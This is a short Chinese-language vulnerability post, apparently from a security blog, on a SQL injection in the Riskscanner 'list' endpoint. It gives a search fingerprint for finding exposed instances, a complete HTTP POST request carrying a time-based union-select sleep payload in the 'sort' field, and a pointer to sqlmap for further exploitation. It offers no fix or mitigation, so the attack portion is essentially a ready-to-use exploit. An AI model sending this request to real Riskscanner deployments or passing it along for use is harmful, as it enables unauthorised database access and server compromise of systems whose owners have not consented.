Riskscanner list SQL注入漏洞

漏洞描述

Riskscanner list接口存在SQL注入漏洞,通过漏洞可获取服务器权限。

漏洞影响

Riskscanner

网络测绘

title=”Riskscanner”

漏洞复现

登录页面

20240430155122241-image-20210718204906366.c5a2bef6_2024-04-30_15-50-52 (1)

发送漏洞请求包

POST /resource/list/1/10 HTTP/1.1
Host: 
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/json;charset=UTF-8

{"sort":"1)a union select sleep(5) -- -"}

20240430155210184-image-20210718204929186.ff97f37b_2024-04-30_15-51-48 (1)

使用工具Sqlmap

20240430155253715-image-20210718204944301.5bbf8718_2024-04-30_15-52-30 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容